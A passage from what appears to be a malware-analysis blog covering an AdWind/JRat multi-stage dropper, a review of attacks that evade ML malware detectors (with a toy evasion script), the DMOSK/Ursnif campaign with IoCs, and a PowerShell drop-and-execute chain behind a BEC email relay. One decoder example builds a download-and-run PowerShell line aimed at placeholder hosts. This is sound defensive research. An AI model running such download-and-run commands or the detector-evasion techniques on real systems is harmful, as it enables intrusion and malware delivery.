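    r"|(?P<ident>[A-Za-z_$][A-Za-z0-9_$]*)",    # identifier
    re.S,
)
# Identifiers built only from O, o and 0 (a JS identifier cannot start with 0).
LOOKALIKE = re.compile(r"^[Oo][Oo0]{3,}$")


def auto_mapping(src, prefix="v"):
    """Number the look-alike identifiers in order of first appearance."""
    mapping = {}
    for m in TOKEN.finditer(src):
        name = m.group("ident")
        if name and LOOKALIKE.match(name) and name not in mapping:
            mapping[name] = "%s%d" % (prefix, len(mapping) + 1)
    return mapping


def rename_identifiers(src, mapping):
    """Whole-token rename driven by an explicit {old: new} mapping, so the
    analyst can rerun it with meaningful names once a function is understood."""
    def repl(m):
        name = m.group("ident")
        return mapping.get(name, m.group(0)) if name else m.group(0)
    return TOKEN.sub(repl, src)


def deobfuscate(src):
    mapping = auto_mapping(src)
    return rename_identifiers(src, mapping), mapping


# Constructed sample in the OOoo00 style: note the name inside the string
# literal and inside the comment, and the parameter that shadows the global.
SAMPLE_JS = (
    'var OOoo00 = "OOoo00 inside a string must stay";\n'
    'var OOoo00O = OOoo00.split("");\n'
    'function OOoo0O(OOoo00) { return OOoo00 + OOoo00O.length; } // OOoo00 in comment\n'
)

if __name__ == "__main__":
    out, mapping = deobfuscate(SAMPLE_JS)
    print(mapping)
    print(out)
    # Second pass with analyst-chosen names, applied to the original source.
    mapping["OOoo00"] = "payload"
    print(rename_identifiers(SAMPLE_JS, mapping))
```

Because renaming is driven by a dictionary, the workflow the post wishes for falls out naturally: run auto_mapping once to get readable placeholders, read the code, then edit the mapping entry by entry (OOoo00 becomes payload, OOoo0O becomes decryptAndLoad, and so on) and rerun rename_identifiers on the original text.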
What is interesting (at least from my personal point of view) is the way the attacker (ab)used the JS-JVM integration. The JavaScript runs in the Java context, meaning it can call Java functions through the contextual Java classes. In this stage the JavaScript loads an encrypted resource from the original JAR, decrypts that content using a key and finally loads it in memory (dynamic class loader) in order to fire it up as new Java code. The encryption algorithm is AES, and everything we need to decrypt is in this file, so let's build a simple Python script to print our decryption parameters. The following image shows the decoding script made to easily reconstruct the AES key and the surrounding parameters. NB: the Python code is not for production, it is not protected and is full of imprecisions. I made it up just to decode the AES key and such, so don't judge it; take it as known weak but working dirty code.
Python Script to Decode AES-KEY

We now have every decoding parameter, we just need to decrypt the classes by using the following data:
  • ClassName
  • Resource (a.k.a package in where it will be contextualised)
  • Byte to be decrypted
  • Secret Key
  • Byte Length to be decrypted
A simple Java decrypter was developed following the original malware code. Once run, the following code was decrypted.

Stage 3 Decrypted JavaClass
Here is my favourite point. As you might appreciate from the previous image we are facing a new stage (Stage 3). What is interesting about this new stage is the way it mirrors the old code: it is a de facto replica of Stage 2. We have new classes to be decrypted (red tag on the image), the same algorithm (orange label on the image), a new key (this time not derived by an algorithm as in Stage 2 but simply in clear text, orange tag on the image) and the same reflective technique, in which the attacker dynamically loads the decrypted content from memory into the Java class loader and uses it to decrypt a further step, after which the code repeats again and again. There is an interesting difference though: this stage builds a new in-memory stage (let's call it Stage 4) by adding static GZipped content at the end of the encrypted section (light blue tag on the image). By using that technique the attacker can chain as many decryption stages as he desires.

At the end of the decryption loop (which took a while, really) the sample saves (or drops from itself, if you wish) an additional file placed in AppData\Local\Temp named _ARandomDecimalNumber.class. This .class is actually a JAR file carrying a whole function set. The final stage, before ending, runs the following command:

 java -jar _ARandomDecimalNumber.class

The execution of that command drops three new files on the local hard drive (AppData\Local\Temp) named RetrieveRandomNumber.vbs (2x) and RandomName.reg. The following image shows a simple 'cat' of the just-dropped files.

On Final Stage VBS Run Files

It is quite funny to see that the attacker needed yet another scripting language (he already needed Java as the original entry point and JavaScript for payload decryption, and now he is using VBS!) to query WMI in order to retrieve the installed antivirus and firewall information. Significant is the choice to use a .reg file to enumerate tons of security tools that are widely used by analysts to analyse malware. The attacker enumerates 571 possible analysis tools that should not be present on the target (victim) machine. Brave, but not neat at all (in my personal opinion). The sample does not evade the system: it forces a kill of each such process regardless of whether it is installed or not, brute-force process killing if you like. The sample enters a big loop where it launches 571 kills, one for each enumerated (.reg) analysis program. It copies the entire Java VM through xcopy.exe into AppData\Roaming\Oracle and, by changing the local classpath environment, uses that copy to perform the following actions. It finally drops and executes another payload called "plugins".
The following image shows the plugins file and the initial JAR of the new stage.

Final Dropped Files (_RandomDec and plugins)

At first sight, an experienced malware reverse engineer would notice that the original sample finally drops an AdWind/JRat, whose main goal is stealing files and personal information from victims. While AdWind/JRat is not interesting per se, since it has been widely analysed, this new way to deliver it definitely fascinates me. The attacker mixed obfuscation techniques, decryption techniques, file-less abilities, multi-language stages and evasion* techniques in order to deliver this AdWind/JRat version. Multiple programming styles were found along the analysis path. Each stage, with its specific programming language, is atomic, meaning it could be run separately and each following stage could easily consume its outputs. All these indicators make me believe the original sample was built using a malware builder, which, BTW, perfectly fits the AdWind philosophy of running as a service platform.

A final consideration is about timing. Checking the VirusTotal details (remembering that only 6 out of 60 AVs were able to say the original JAR was malicious or unwanted) you might notice the following timeline.

Detection Time Line (VirusTotal)
VT shows the first time it captured that hash (sha256): it was in 2016. But the first submission is on 2018-08-14, a few days ago. On that date (2018-08-14) only 6 out of 60 detected suspicious (malicious) behaviour and flagged it red. But what about the almost 2 years between December 2016 and August 2018? If we assume the malware is 2 years old, was it silent until now (until my submission)? Did we have the technology two years ago to detect such a threat? Or could it be a targeted attack that took almost 2 years before being deployed?

I currently have no answers to these questions; I hope you might find some.

*Actually not really an evasion technique, more likely a toolset mitigation.

IoC
You will not find command and controls (C2) and dropping URLs because: (i) no dropping URL was found: the sample extracts its contents from itself; (ii) no C2 is contacted during the delivery stage. Of course AdWind/JRat does C2, but, as explained, the analyst did not follow up on the analysis of AdWind/JRat since it is well-known malware.
  
hash: 

  • e5c67daef2226a9e042837f6fad5b338d730e7d241ae0786d091895b2a1b8681 (Original)
  • 97d585b6aff62fb4e43e7e6a5f816dcd7a14be11a88b109a9ba9e8cd4c456eb9 (_RandomDec..)
  • 9da575dd2d5b7c1e9bab8b51a16cde457b3371c6dcdb0537356cf1497fa868f6 (Retrieve1)
  • 45bfe34aa3ef932f75101246eb53d032f5e7cf6d1f5b4e495334955a255f32e7 (Retrieve2)
  • 296a0ed2a3575e02ba22e74fd5f8740af4f72b629e4e50643ac0c156694a5f3c (.reg)
  • 32d28c43af1afc977b96436b7f638fba15188e6120eeaefa1ad91fb82015fd80 (plugins)


File Paths:

  • ..AppData/Local/Temp/_ARandomDecimalNumber.class
  • ..AppData/Local/Temp/RetrieveRandomNumber.vbs
  • ..AppData/Local/Temp/RetrieveRandomNumber.vbs
  • ..AppData/Local/Temp/RandomName.reg


Tuesday, June 26, 2018

Attacking Machine Learning Detectors: the state of the art review

Machine learning (ML) is a great approach to detect malware. It is widely used by both the technical community and the scientific community, with two different perspectives: performance vs. robustness. The technical community tries to improve ML performance in order to increase usability at large scale, while the scientific community focuses on robustness, meaning how easy it would be to attack an ML detector engine. Today I'd like to focus our attention a little bit on the second perspective, pointing out how to attack ML detector engines.

We might start by classifying machine learning attacks into three main sets:

  1. Direct Gradient-Based Attack. The attacker knows the ML model: its structure and its weights. With those he can compute gradients directly, query the model, and work out the cheapest way to evade it.
  2. Score Model Attack. The attacker does not know the ML model or its weights, but he has direct access to the detection engine and can probe it. The model returns a score and, based on that score, the attacker can work out how to minimise it by feeding specially crafted inputs.
  3. Binary Black Box Attack. The attacker knows nothing about the ML model or its weights and has no score to read, but he has unlimited access to probe the model and observe its binary verdict.
Direct Gradient-Based Attack

A direct gradient-based attack can be implemented in at least two ways. The first, and most used, is to apply small changes to the original sample in order to reduce the given score. The changes must stay within a specific domain, for example a valid Windows PE file or a valid PDF file, and they must be small and chosen to minimise a scoring function derived from the weights (which are known in a direct gradient-based attack). The second way is to connect the targeted model (the model under attack) to a generator model in a generative adversarial network (GAN). Unlike the first approach, the GAN generator learns how to generate a completely new sample, derived from a given seed, that minimises the scoring function.

I. Goodfellow et al. in their work "Explaining and Harnessing Adversarial Examples" (here) showed how small perturbations of a given sample X, aligned with the gradient of the loss with respect to the input, are effective at evading ML classifiers. Another great work is by K. Grosse et al., titled "Adversarial Perturbations against deep neural networks for malware classification" (here). The authors attacked a deep learning Android malware model, trained on the DREBIN Android malware data set, by applying a small perturbation to the feature vector, restricted to adding features so that the application keeps working. They had very interesting results, getting from 50% to 84% evasion rate. I. Goodfellow et al., in their work titled "Generative Adversarial Nets" (here), developed a GAN able to iterate a series of adversarial rounds to generate samples that the targeted model classified as "ham" but that really were not. The following image shows how generative adversarial nets are trained by simultaneously updating the discriminative distribution (D, blue, dashed line) so that it discriminates between samples from the data generating distribution px (black, dotted line) and those of the generative distribution pg (G) (green, solid line).

Image from: "Generative Adversarial Nets"



Score Model Attack

The attacker's posture in this attack set can be described as myopic. He does not know exactly how the ML model works and has no idea about how the weights change inside the ML algorithm, but he can test his sample and get back a score, so he is able to measure the effect of an input perturbation.

W. Xu, Y. Qi and D. Evans in their work titled "Automatically evading classifiers" (here) implemented a "fitness function" which gives a fitness score to each generated variant. A variant with a positive fitness score is evasive: the fitness score captures whether the targeted model classifies the current sample as benign while the sample retains its malicious behaviour. Once a sample gets a high fitness score it is used as a seed in a more general genetic algorithm, which manipulates the seed to create different species. To ensure that those mutations preserve the malicious behaviour of the original seed the authors used an oracle, in this case Cuckoo Sandbox.

Image from: "Automatically evading classifiers"


After one week of execution the genetic algorithm found more than 15,000 evasive variants from around 500 malicious seeds, reaching a 100% evasion rate against the PDFrate classifier.

Binary black-box attacks

Binary black-box attacks are the most general ones, since the attacker knows nothing about the model and the anti-malware engine only answers True or False (it is malware or it is not). In 2017 W. Hu and Y. Tan did great work described in "Generating Adversarial Malware Examples for Black-Box Attacks Based on GAN" (here). The authors developed MalGAN, an adversarial malware generator able to generate valid PE malware that evades a static black-box PE malware engine. The idea behind MalGAN is simple. First the attacker maps the black-box outputs by submitting specific, known samples (malware and goodware PE). After the mapping phase the attacker builds a substitute model that behaves like the black-box model: a simple model trained to reproduce the verdicts of the targeted one. The substitute is then used as the target model in a gradient-computing GAN to produce evasive malware. The authors reported 100% efficacy in bypassing the target model. H. S. Anderson et al. in "Evading Machine Learning Malware Detection" (here) adopted a reinforcement learning approach. The following image shows the Markov decision process formulation of the malware evasion reinforcement learning problem.

Image from: Evading Machine Learning Malware Detection


The agent is the function that manipulates the sample depending on the environment state. Both the reward and the state are fed back to the agent so that it can decide the next action. The agent learns from the reward, which depends on the reached state: for example the reward is higher if the reached state is close to the desired one, and lower otherwise. The authors use a Q-learning technique so that the agent does not overvalue an immediate negative reward for an action that pays off in the medium to long term.

"In our framework, the actions space A consists of a set of modifications to the PE file that (a) don’t break the PE file format, and (b) don’t alter the intended functionality of the malware sample. The reward function is measured by the anti-malware engine, which is converted to a reward: 0 if the modified malware sample is judged to be benign, and 1 if it is deemed to be malicious. The reward and state are then fed back into the agent."
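The three attack sets above, run against one toy detector, as an added example that is not code from this post or from any of the papers cited: a gradient attack that uses the known weights, a score-probing attack that only sees the returned score, and a binary black-box attack that fits a substitute model to True/False verdicts and attacks that instead. The detector, its weights, the eight feature names and the sample set are all constructed for the example; the score-probing attack is a plain hill climb rather than the genetic algorithm of Xu et al., the substitute is fitted by gradient descent rather than by MalGAN's generator, and the reinforcement learning approach of Anderson et al. is not shown. The functional constraint of Grosse et al. (only add features, never remove) is what keeps the perturbed sample inside the feasible domain.

```python
import math

# Constructed toy detector for this example: logistic regression over 8 binary
# features (permissions / API calls, DREBIN-style). The weights are invented;
# positive weights push towards "malicious".
FEATURES = ["SEND_SMS", "READ_CONTACTS", "dex_loader", "crypto_api",
            "INTERNET", "ACCESS_NETWORK_STATE", "ui_layout", "play_services"]
WEIGHTS = [1.5, 0.8, 1.2, 0.6, 0.2, -0.5, -1.6, -2.4]
BIAS = -1.0
THRESHOLD = 0.5

def sigmoid(z):
    return 1.0 / (1.0 + math.exp(-z))

def score(x, weights=WEIGHTS, bias=BIAS):
    """Maliciousness probability, as a score-returning detector exposes it."""
    return sigmoid(bias + sum(w * xi for w, xi in zip(weights, x)))

def is_malware(x):
    """Binary verdict: the only thing a black-box detector exposes."""
    return score(x) >= THRESHOLD

def preserves_behaviour(original, variant):
    """Stand-in for the sandbox oracle of Xu et al.: every feature of the
    original must survive, since we only ever add permissions or API calls."""
    return all(v >= o for o, v in zip(original, variant))

def gradient_attack(x, weights=WEIGHTS, bias=BIAS, verdict=None, max_changes=8):
    """Direct gradient-based attack (Grosse et al. style). The perturbation is
    kept inside the feasible domain by only *adding* features; each step adds
    the unset feature whose gradient lowers the score most. `verdict` is the
    stop condition, by default the model's own threshold."""
    verdict = verdict or (lambda v: score(v, weights, bias) >= THRESHOLD)
    x, changes = list(x), []
    while verdict(x) and len(changes) < max_changes:
        s = score(x, weights, bias)
        grad = [w * s * (1 - s) for w in weights]            # d score / d x_i
        cand = [(grad[i], i) for i in range(len(x)) if not x[i] and grad[i] < 0]
        if not cand:
            break                                             # nothing left to add
        i = min(cand)[1]
        x[i] = 1
        changes.append(FEATURES[i])
    return x, changes

def score_attack(x, oracle, max_changes=8):
    """Score-model attack: no weights, only the returned score. Hill-climb by
    trying every single-feature addition and keeping the one that lowers the
    score most; `queries` counts what that costs in probes."""
    x, changes, queries = list(x), [], 0
    for _ in range(max_changes):
        current = oracle(x); queries += 1
        if current < THRESHOLD:
            break
        best = None
        for i in range(len(x)):
            if x[i]:
                continue
            trial = x[:]; trial[i] = 1
            s = oracle(trial); queries += 1
            if best is None or s < best[0]:
                best = (s, i)
        if best is None or best[0] >= current:
            break                                             # local minimum
        x[best[1]] = 1
        changes.append(FEATURES[best[1]])
    return x, changes, queries

def train_substitute(samples, black_box, epochs=300, lr=0.5):
    """Binary black-box attack, MalGAN's first step simplified: label samples
    the attacker already owns with the detector's True/False verdicts, then
    fit a substitute logistic model to those labels by gradient descent."""
    n, m = len(samples[0]), len(samples)
    w, b = [0.0] * n, 0.0
    y = [1.0 if black_box(x) else 0.0 for x in samples]
    for _ in range(epochs):
        errs = [score(x, w, b) - yi for x, yi in zip(samples, y)]
        w = [wi - lr * sum(e * x[i] for e, x in zip(errs, samples)) / m
             for i, wi in enumerate(w)]
        b -= lr * sum(errs) / m
    return w, b

# Constructed sample set the attacker owns; their verdicts come only from the
# black box. The original malware carries SMS, contacts and a dex loader.
KNOWN_SAMPLES = [
    [0, 0, 0, 0, 1, 1, 1, 1], [0, 1, 0, 0, 1, 1, 1, 0],
    [0, 0, 0, 1, 1, 0, 1, 1], [1, 0, 0, 0, 1, 1, 1, 1],
    [1, 1, 1, 1, 1, 0, 0, 0], [1, 0, 1, 0, 1, 0, 0, 0],
    [0, 1, 1, 1, 1, 1, 0, 0], [1, 1, 0, 1, 0, 0, 1, 0],
]
ORIGINAL_MALWARE = [1, 1, 1, 1, 1, 0, 0, 0]

def black_box_attack(x, samples=KNOWN_SAMPLES):
    """Follow the substitute's gradient, but stop on the real binary verdict,
    so the result is checked against the detector we actually want to evade."""
    w, b = train_substitute(samples, is_malware)
    return gradient_attack(x, w, b, verdict=is_malware)

if __name__ == "__main__":
    results = {"gradient (white-box)": gradient_attack(ORIGINAL_MALWARE)[:2],
               "score probing": score_attack(ORIGINAL_MALWARE, score)[:2],
               "binary black-box": black_box_attack(ORIGINAL_MALWARE)}
    for name, (adv, changes) in results.items():
        print(f"{name:22s} evaded={not is_malware(adv)} added={changes} "
              f"behaviour_ok={preserves_behaviour(ORIGINAL_MALWARE, adv)}")
```

The point to notice is the cost, not the outcome: all three end up adding the same two benign-looking features, but the white-box attack needs no probes at all, the score-probing attack spends eight queries on this tiny feature space (and grows with the number of candidate modifications), and the binary black-box attack pays up front by labelling a sample set and then only needs a verdict per step.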

Final Considerations

Machine learning, and more generally artificial intelligence, is useful to detect cyber attacks but unfortunately, as the works reviewed in this post show, it is not enough per se. Attackers use the same techniques, such as adversarial machine learning, to evade ML detectors. Cyber security analysts will still play a fundamental role in cyber security science and technology for many years to come. A technology that promises to ensure cyber security protection without human interaction is not going to work.



Friday, June 8, 2018

DMOSK Malware Targeting Italian Companies

Today I'd like to share another interesting analysis made by my colleagues and me. It is a nice and interesting one since the threat targeted many Italian and European companies. Fortunately the attacker forgot the LOG.TXT freely available on the dropping URL, letting us know the IP addresses that clicked on the first analysed stage (yes, we know the companies that might be infected). Unlike what we did with TaxOlolo, we will not disclose the victims' IP addresses and so the companies which might be infected. National CERTs have been involved and have been alerted. Since we believe the threat could radically increase its magnitude in the following hours, we decided to write up this quick'n dirty analysis focusing on speed rather than on details. So please forgive some quick and undocumented steps.

Everything started from an email (how about that?!). The email we got had the following body.

Attack Path
A simple link to a drive (drive.carlsongracieanaheim.com) begins the first stage of infection. An email address is passed as a parameter to the doc.php script, which records the IP address and the "calling" email address belonging to the victim. The script forces the browser to download a .zip file which, once uncompressed, presents the victim with a JSE file called scan.jse. The file is heavily obfuscated. It was quite difficult to decode the following stage of infection since the JavaScript was obfuscated through at least 3 different techniques. The following image shows the obfuscated sample.

Second Stage: Obfuscated JSE
Unfortunately the second stage is not the final one. Once de-obfuscated, we figured out that it drops and executes another file with the .SCR extension. At this stage it is interesting to observe that only one dropping URL is called. This is unusual: attackers normally use multiple dropping URLs in order to get more chances to infect the victims. The URL found was the following:

"url": "https://drive.carlsongracieanaheim.com/x/gate.php"

The JSE file dropped the third stage into \User\User\AppData\Local\Temp\38781520.scr, having the following hash: 77ad9ce32628d213eacf56faebd9b7f53e6e33a1a313b11814265216ca2c4745, which had previously been analysed by 68 AV engines, but only 9 of them recognised it as a generic malicious file. The following image shows the VirusTotal analysis.



Third Stage: Executable SCR file


Unfortunately we are still not at the end of the infection chain. The third stage drops and executes another payload. It does not download it from a different dropping website; it unpacks it from a crafted memory region (at .text:0x400000). The following image shows the execution of the fourth stage payload directly from the victim's memory.

Fourth Stage: Dropped PE File
Following the analysis it has been possible to figure out that the final payload is something very close to Ursnif, which grabs the victim's email information and credentials. The following image shows the temporary file built before sending information out to the Command and Control servers.

Temporary File Before Sending data to Command and Control

Like any other Ursnif, the malware tries to reach a command and control network located both on the clearnet and on the Tor network. A following section lists the recorded IoCs.

An interesting approach adopted by the attackers is blacklisting. We observed at least 3 blacklists. The first one was based on the victim's IP. We guess (but we have no evidence of that) that the attacker filters responses by country, in order to run a country-targeted attack by blacklisting non-targeted countries. The following image shows the temporary file used to store the victim's IP. The attacker could use this information to decide whether or not to respond to a specific malware request.

Temporary File Storing IP Victim IP Address

A second blacklist was found on the dropping URL web site, which was configured not to drop files to specific IP addresses. The three reasons found for denying the payload were:
  • geo (out of geographical scope). The threat is mainly focused on hitting Italy.
  • asn (internet service providers and/or cloud providers). The threat is mainly focused on clients and not on servers, so it makes no sense to serve the payload to cloud providers.
  • MIT. The attacker does not want the dropped payload to end up with MIT folks; this is quite funny, isn't it?
A small section of the drop-payload blacklist



The blacklists are an interesting approach to reduce the chance of being analysed: the blacklisted IPs belong to well-known cyber security companies (Yoroi included), which often use specific cloud providers to run emulations and/or sandboxes.

Personal note: this is a reverse targeting attack, where the attacker wants to hit an entire set of victims except some specific ones, so he introduces a technique that blocks payload delivery to them. End personal note.

Now that we know how the attack works, let's investigate a little what the attacker messed up. For example, let's analyse the content of the dropping URL. Quite funny to find out that the attacker left his private key freely available! I will not disclose it... let's say... out of respect for the attacker (? really ?)

Attacker Private Key!

While the used public certificate is the following one:

Attacker Certificate

By decoding the fake certificate the analyst obtains the following information; of course none of it is particularly valuable, but it makes for a nice bit of analysis.

Common Name: test.dmosk.local
Organization: Global Security
Organization Unit: IT Department
Locality: SPb
State: SPb
Country: RU
Valid From: June 5, 2018
Valid To: June 5, 2022
Issuer: Global Security
Serial Number: 12542837396936657430 (0xae111c285fe50a16)

Maybe the most "original" string, meaning one written by the attacker without thinking too much, in the entire analysis is the string "dmosk" (in the decoded certificate); from here the malware name.

As of today we observed 6617 email addresses that could potentially be compromised, since they clicked on the first stage (evidence on the dropping URL). We have evidence that many organisations have been hit by this malware, which bypassed most of the known security protections since it was hosted behind Cloudflare and had no specific bad reputation. We decided not to disclose the "probably infected" companies. National CERTs were alerted (June 7 2018) and together we will contact the "probably infected" companies to help them mitigate the threat.

Please update your rules, signatures and whatever else you have to block the infection.

PS: the threat is quite a bit bigger than what I described; there are several additional components, including an APK (Android malware), base ciphers, multi-stage obfuscators and a complete list of "probably infected" users, but again, we decided to favour notification speed over analysis detail.

Hope you might find it helpful.


IoC:
  • Dropurl:
    • https:// drive[.carlsongracieanaheim[.com/doc.php
    • https:// drive[.carlsongracieanaheim[.com/doc1.php
    • https:// drive[.carlsongracieanaheim[.com/x/gate.php
    • https:// drive[.carlsongracieanaheim[.com/1/gate.php
  • C2 (tor):
    • https:// 4fsq3wnmms6xqybt[.onion/wpapi
    • https:// em2eddryi6ptkcnh[.onion/wpapi
    • https:// nap7zb4gtnzwmxsv[.onion/wpapi
    • https:// t7yz3cihrrzalznq[.onion/wpapi
  • C2:
    • https:// loop.evama.[at/wpapi
    • https:// torafy[.cn/wpapi
    • https:// u55.evama[.at/wpapi
    • https:// yraco[.cn/wpapi
    • https:// inc.robatop.[at/wpapi
    • https:// poi.robatop.[at/wpapi
    • https:// arh.mobipot.[at/wpapi
    • https:// bbb.mobipot.[at/wpapi
    • https:// takhak.[at/wpapi
    • https:// kerions.[at/wpapi
    • https:// j11.evama[.at/wpapi
    • https:// clocktop[.at/wpapi
    • https:// harent.[cn/wpapi
  • Hash:
    • 067b39632f093821852889b1e4bb8b2a48afd94d1e348702a608a70bb7b00e54 zip
    • 77ad9ce32628d213eacf56faebd9b7f53e6e33a1a313b11814265216ca2c4745 jse
    • 8d3d37c9139641e817bcf0fad8550d869b9f68bc689dbbf4b4d3eb2aaa3cf361 scr
    • 1fdc0b08ad6afe61bbc2f054b205b2aab8416c48d87f2dcebb2073a8d92caf8d exe
    • afd98dde72881d6716270eb13b3fdad2d2863db110fc2b314424b88d85cd8e79 exe
  • Cert:
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----

Sunday, May 27, 2018

MalHide: an interesting Malware sample

Today I'd like to share an interesting (at least to me) analysis of a given sample. I have called this sample MalHide, but you will see why only at the end of my post :D. I believe this is quite an interesting malware since it first implements several obfuscation stages using different obfuscation techniques, and second it implements a fairly new attack path (not new per se, but new for opportunistic malware families) where the attacker does not want to steal information and/or compromise a system for possession and/or destruction, but uses the compromised system as an email relay in order to hide the attacker's networks. It is striking to see that attackers are primarily moving towards fraud. For example, having obtained privileged access to the victim machine, the attacker might perform several malicious actions, but among all the choices he decides to spawn an SMTP relay to send fraud emails anonymously. Based on my past experience this is quite weird, isn't it?!

Disclaimer: I'm not going into details on every step since I am not writing a tutorial; rather, I'd like to show that threats are getting more and more complex in a relatively short time and that this attack path is quite unique, at least in my personal experience.

Everything started from an email attachment. "Nuovo Documento.doc" is its name, and it was able to bypass every single anti-spam and anti-malware engine the target had. The following image shows the initial stage, where the ".DOC" file seems benign but not compatible with the running Microsoft Word instance.

Sample as it looks like on opening. Stage 1

The sample contains some macro functions. Many junk functions have been injected into the VBA side in order to make life harder for reverse engineers, but fortunately the Microsoft VBA Editor included in the Microsoft Office suite implements a useful debugger. The analyst observes that the AutoOpen() function is preserved and filled with code. It took almost 3 seconds to figure out it was malicious code. The following image shows the Microsoft VBA Editor debugging view, where it is possible to see the variable qZbTUw containing encoded PowerShell code. Here we are! The second stage is approaching the victim.

Stage 2. A running instance of PowerShell invoked by VBA

The PowerShell code was Base64 encoded and additionally obfuscated through "variable mess". This technique is quite common among JavaScript devs, since the code they develop runs client side and obfuscation is a technique used to protect (sort of) the written code, but in this scenario it looks like a simple implementation of fileless staging, where the attacker runs a PowerShell script directly from memory without saving it to disk. This way the PowerShell execution policy (a registry setting) that restricts running scripts from file does not get in the way, and it is much harder for antivirus to detect the infection stage. The script then fires off the next stage of the infection. PowerShell ISE helps us reverse the dropped payload. The following images show the decoding process, from the single line of obfuscated code to the dropping URLs. I know, it's almost impossible to see the images since they look small, but please click on them for a bigger view, if you wish.

Stage 3. Decoding Powershell Drop-and-Execute


Stage 3. Decoded Powershell Drop-and-Execute
The analyst is now able to identify the dropping websites and block them (please refer to the IoC section)! The executed actions are quite standard: from an array of dropping websites, cycle over them and take the one that serves the file. The cycling policy may differ from sample to sample, since they could use a pseudo-random seed generator, an incremental rotation, a round-robin rotation and so on. For this analysis the cycling policy is not interesting at all, since we decoded all the possible dropping URLs. The PowerShell command gets 52887.exe from the external source (the dropping websites), places it in C:\Users\Public\52887.exe and finally runs it. Stage 4 has begun: a new PE sample has been executed. The following image shows Stage 4 dropping another stage into C:\Windows\SysWOW64\fonduewwa.exe. Fortunately this stage unpacks the code from itself without touching the network. fonduewwa.exe is then executed.
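Decoding a `-EncodedCommand` launcher of the kind the macro above fires, as an added example that is not the post's code: it takes a constructed command line (the script, the URLs and the file name are invented for the example, with `.invalid` domains so nothing resolves), decodes the UTF-16LE Base64 blob, folds the `'a'+'b'` string splitting that the post calls "variable mess", and pulls out the dropping URLs and the dropped file name to block.

```python
import base64
import re

# Constructed stand-in for the kind of command line the macro launches. The
# post's real script is not reproduced; this one is built inline so the
# decoder has something to work on. The first URL is split with 'a'+'b'
# string concatenation, the "variable mess" style the post describes.
SCRIPT = ("$a=@('http://exam'+'ple-drop-1.invalid/x/','http://example-drop-2.invalid/y/');"
          "$p=$env:PUBLIC+'\\52887.exe';"
          "foreach($u in $a){try{(New-Object Net.WebClient).DownloadFile($u,$p);"
          "Start-Process $p;break}catch{}}")
ENCODED = base64.b64encode(SCRIPT.encode("utf-16-le")).decode()
CMDLINE = "powershell.exe -NoP -W Hidden -Enc " + ENCODED

ENC_ARG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
URL = re.compile(r"https?://[^\s'\"()]+")
DROPPED = re.compile(r"\\([\w-]+\.(?:exe|scr|dll|vbs|jse|ps1))", re.I)

def decode_encoded_command(cmdline):
    """Pull the -Enc/-EncodedCommand blob out of a command line and decode it.
    PowerShell expects UTF-16LE, which is why the blob is about twice the
    script's size and why a plain UTF-8 decode yields NUL-separated garbage."""
    m = ENC_ARG.search(cmdline)
    if not m:
        raise ValueError("no encoded command argument found")
    return base64.b64decode(m.group(1)).decode("utf-16-le")

def fold_concatenations(script):
    """Merge 'a'+'b' into 'ab' until nothing changes, so indicators split
    across string pieces become visible to the regexes below."""
    while True:
        folded = CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
        if folded == script:
            return folded
        script = folded

def extract_indicators(script):
    """Return (dropping URLs, dropped file names) found in a decoded script."""
    return URL.findall(script), DROPPED.findall(script)

def analyse(cmdline):
    """End-to-end: decode, de-split strings, extract what to block."""
    folded = fold_concatenations(decode_encoded_command(cmdline))
    urls, files = extract_indicators(folded)
    return {"script": folded, "urls": urls, "files": files}

if __name__ == "__main__":
    for key, value in analyse(CMDLINE).items():
        print(f"{key}: {value}")
```

Without the folding step the first URL is reported as `http://exam`, which is exactly the kind of fragment that makes a hastily written blocklist miss the real host; more aggressive obfuscation (char codes, `-join`, `-replace` chains) needs further passes of the same shape.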

Stage 4. 52887.exe dropping to C:\Windows\SysWOW64\fonduewwa.exe

The new stage (Stage 4) performs the following steps:

1) It starts a service which acts as an SMTP client.
2) It connects to a Command and Control which provides email addresses, SMTP relays, and the email bodies to be sent.
3) It sends the emails, which carry BEC fraud attempts.

The following images show the Command and Control address. The first image shows the Windows API used, while the second one shows the connections opened directly on the infected machine.

Command and Control IP Address (click to make it bigger)

Command and Control DNS resolution (click to make it bigger)


The Command and Control (C2) listens at c-67-176-238-209.hsd1.il.comcast.net, which today resolves to 67.176.238.209. The C2 answers HTTP queries carrying a specific set of cookies, as the following image shows. Replaying the communication, made possible by reconstructing the cookies from the sniffed traffic, gets back about a kB of encoded data from the C2.

Command and Control Communication through HTTP

From the C2 come actions, victim addresses, SMTP servers and passwords. The sample connects to the given SMTP relays, authenticates and sends emails to the victims. The following image proves that the attackers have plenty of credentials for SMTP relays around the globe.

Connection to real SMTP relays

For now I will not disclose the usernames and passwords used to access the SMTP relays, but if you can prove to be the owner of (or at least to work for the company owning) one of them, let's have a chat about it: many interesting things are happening in your network. The emails sent from the analysed sample target specific victims. It was pretty easy to figure out that we were facing a new attack vector! This attack vector looks like BEC (or CEO scam) against specific targets. For those of you not familiar with this attack I am copying the definition provided by SANS (here).
"Cyber criminals have developed a new attack called CEO Fraud, also known as Business Email Compromise (BEC). In these attacks, a cyber criminal pretends to be a CEO or other senior executive from your organization. The criminals send an email to staff members like yourself that try to trick you into doing something you should not do. These types of attacks are extremely effective because the cyber criminals do their research. They search your organization's website for information, such as where it is located, who your executives are, and other organizations you work with. The cyber criminals then learn everything they can about your coworkers on sites like LinkedIn, Facebook, or Twitter. Once they know your organization's structure, they begin to research and target specific employees. They pick their targets based on their specific goals. If the cyber criminals are looking for money, they may target staff in the accounts payable department. If they are looking for tax information, they may target human resources. If they want access to database servers, they could target someone in IT. Once they determine what they want and whom they will target, they begin crafting their attack. Most often, they use spear phishing. Phishing is when an attacker sends an email to millions of people with the goal of tricking them into doing something, for example, opening an infected attachment or visiting a malicious website. Spear phishing is similar to phishing; however, instead of sending a generic email to millions of people, they send a custom email targeting a very small, select number of people. These spear phishing emails are extremely realistic looking and hard to detect. They often appear to come from someone you know or work with, such as a fellow employee or perhaps even your boss. The emails may use the same jargon your coworkers use; they may use your organization's logo or even the official signature of an executive. These emails often create a tremendous sense of urgency, demanding you take immediate action and not tell anyone."

Below are a few examples of the emails coming from the C2 and delivered through the analysed sample.


